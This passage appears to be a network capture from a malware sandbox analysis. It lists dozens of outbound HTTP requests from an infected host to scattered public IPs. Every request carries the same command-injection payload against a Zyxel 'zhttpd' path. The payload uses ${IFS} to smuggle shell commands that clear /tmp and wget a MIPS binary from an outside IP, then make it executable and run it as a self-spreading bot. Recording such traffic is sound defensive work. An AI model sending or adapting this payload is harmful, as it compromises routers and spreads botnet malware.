                                                            549192.168.2.135215269.107.90.253443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528424978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            550192.168.2.135674644.42.52.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528425932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            551192.168.2.135123663.223.125.186443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528469086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            552192.168.2.134403054.225.192.22443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528479099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            553192.168.2.135346680.215.195.70443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528557062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            554192.168.2.1354306209.5.194.200443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528748989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            555192.168.2.1349272218.43.73.219443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528831959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            556192.168.2.1354012105.167.94.201443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:25.528839111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            557192.168.2.1343218197.47.145.88443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:26.542038918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            558192.168.2.133596868.230.63.198443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:26.542095900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            559192.168.2.1355512109.129.239.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:26.542186022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            560192.168.2.133795098.194.30.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.548887968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            561192.168.2.1358364158.93.224.65443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.548930883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            562192.168.2.135855854.253.51.110443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.548945904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            563192.168.2.1335896139.20.88.152443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.549005985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            564192.168.2.133623827.131.28.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.549022913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            565192.168.2.1359998211.10.117.19443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.549056053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            566192.168.2.133515439.210.168.105443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.549093962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            567192.168.2.1336990163.172.27.155443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.549119949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            568192.168.2.135963423.202.210.42443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553200006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            569192.168.2.133422619.214.78.93443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553201914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            570192.168.2.1360442129.246.61.147443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553378105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            571192.168.2.135000840.53.241.18443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553428888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            572192.168.2.135026837.46.52.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553443909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            573192.168.2.1360638114.1.74.89443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:27.553488016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            574192.168.2.1339114172.113.159.85443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.557147980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            575192.168.2.1346356207.183.58.149443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561157942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            576192.168.2.135438244.65.162.69443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561199903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            577192.168.2.135670018.247.175.13443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561234951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            578192.168.2.1351002106.249.19.83443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561263084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            579192.168.2.1343318188.121.115.175443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561291933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            580192.168.2.1343466171.22.231.8443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561321020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            581192.168.2.135181624.3.226.146443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561413050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            582192.168.2.133578097.31.44.221443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561491966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            583192.168.2.133336483.112.239.175443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561513901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            584192.168.2.1340162175.24.244.176443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:28.561543941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            585192.168.2.1336828147.26.80.86443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569297075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            586192.168.2.1348864205.93.2.125443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569364071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            587192.168.2.135232242.76.126.232443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569360018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            588192.168.2.1360582145.144.241.222443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569447041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            589192.168.2.1352918172.186.156.137443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569461107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            590192.168.2.1346040209.227.13.188443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569484949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            591192.168.2.1356136201.210.233.155443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569514036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            592192.168.2.134565250.166.89.106443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569607019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            593192.168.2.1345670167.40.102.174443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569636106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            594192.168.2.1360392145.251.244.146443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569696903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            595192.168.2.133452242.21.153.133443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569745064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            596192.168.2.133353470.180.123.121443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569772005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            597192.168.2.1343228171.181.14.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569814920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            598192.168.2.134709451.69.244.55443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569834948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            599192.168.2.1345514162.243.13.140443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569915056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            600192.168.2.1339656136.192.202.35443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569928885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            601192.168.2.1346244136.190.61.66443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569937944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            602192.168.2.1357428114.245.177.179443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.569956064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            603192.168.2.135120445.52.110.66443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570000887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            604192.168.2.1358128181.70.50.235443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570007086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            605192.168.2.1332942220.144.229.14443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570071936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            606192.168.2.1341082146.126.243.213443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570095062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            607192.168.2.134816068.42.228.211443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570152044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            608192.168.2.1338192213.229.127.137443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570197105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            609192.168.2.133422897.179.136.198443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:12:29.570226908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            610192.168.2.135486274.50.96.112443
                                                            TimestampBytes transferredDirectionData
